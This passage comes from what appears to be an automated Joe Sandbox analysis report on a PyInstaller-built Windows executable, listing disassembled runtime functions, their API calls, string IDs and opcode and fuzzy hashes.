                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                        • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                        • Instruction ID: a31531986e37b3f08c7b87ef321079f193bfb21479da884998e41de5fc5c64a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20218132A18B8182EB209B51BA817E6B7A4FB98384F480135FE8DE365DDF7CD145C740
                                                                                                                                                                                                                                                        Function 00007FF65E299A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                        • Instruction ID: 155d5326b94b31b14d8fa356372aa58d9387a74935518d61e4a3e5d035f6f0f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFF06221B0970681EF148B24E79437A7325EF65761F5C1239E66EDA1ECDF6CD084C710
                                                                                                                                                                                                                                                        Function 00007FF65E2A9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction ID: 09d96c53053a1ee783bf72b6d2bb2e9f4d25688a64e401f7c725f818e8b7c361
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82113022ED8A4205FE64156FF7E537D3160AF79364E0C4636FB6EBA2DE8EEC68414100
                                                                                                                                                                                                                                                        Function 00007FF65E29B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B407
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B418
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                                        • Instruction ID: 57545900df2ebbeddc6a03fc0ac2e8611eed82c33842112eb317e8b442cd71b7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57114C20E0C65281FE989725A75127931866F647F0F5CB334F93EF66DEDE2CA8828205
                                                                                                                                                                                                                                                        Function 00007FF65E29B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                                        • Instruction ID: 1c8c4090c7d17adfd2f60ab7614e681d0c1d1f36d7b31673ed97ee35efd40acf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6111520E0C21B41FEA863618B5117E31869F667B0F1CA734F93EFA6CEDD2CB8804205
                                                                                                                                                                                                                                                        Function 00007FF65E295FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                        • Instruction ID: c4bd40c471a317186a0f7610681143f251c0e3d24a12b01c383e383a3848a1d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F91A022A0864681EF658F24D75077D37D1AB60B94F8C9136EA5DE73D9DE3CE4858300
                                                                                                                                                                                                                                                        Function 00007FF65E29FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                        • Instruction ID: a4d7f04c1cad38c89c14a0d8034bdca6bfb0025c7281049cb849733b514add01
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91819272E0C26285FFE59E25CB4027836A0AB31B44F5DA035EA49F729DCF2DE9C19311
                                                                                                                                                                                                                                                        Function 00007FF65E28D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                        • Instruction ID: dc0144cef41258664103b5c372b402532d053abb1210b2b39b7b02775b062a5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B519E76A1D7028ADF148F15E344A787399EBA4B98F188130EA8E9778CDF7CE845C700
                                                                                                                                                                                                                                                        Function 00007FF65E28EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                        • Instruction ID: be5a5d41cc323259a5d8d234dfa2d1d91b54ffb53a260cc78273d626d7868cc5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA61933290CBC585EB609B15E6403AAB7A0FBA5794F084225FB9C57B5ADF7CD194CB00
                                                                                                                                                                                                                                                        Function 00007FF65E28F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                        • Instruction ID: 45912996d6aebaf467413735e09d0d91207fc29ce0df9262597b33eb70c30721
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3517C32A0C39A86FF748B21974426877A0FB64B85F185136EB5DA7B9ACF3CE450C701
                                                                                                                                                                                                                                                        Function 00007FF65E287E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF65E28352C,?,00000000,00007FF65E283F23), ref: 00007FF65E287F32
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                        • Instruction ID: a34f78832e090870dd6e79f6e454364a4a4793e84beaf164d7262f6e9e32683b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4231C36261DBC145EE219B21E7107AA7354EBA4BE4F480231FA6DE7BCDDF2CD6058700
                                                                                                                                                                                                                                                        Function 00007FF65E282810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                        • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                        • Instruction ID: 4b393343dca013d37f5b06c7a890ce337744a35cbc7745080f38bfd9bce68162
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB21DE62B08B4182EB109B64FA457EA77A5FB98780F480136FE8DE3659DF3CD245C740
                                                                                                                                                                                                                                                        Function 00007FF65E29C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                        • Instruction ID: cb6d357255cd01fc2b8fa1cd34d9fae909106e45e7c1016b46f613b668eace3f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D10572B18A418AEB11CF65D7412BC37B1FB64798B485236EE5EE7B89DE38D046C700
                                                                                                                                                                                                                                                        Function 00007FF65E29F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
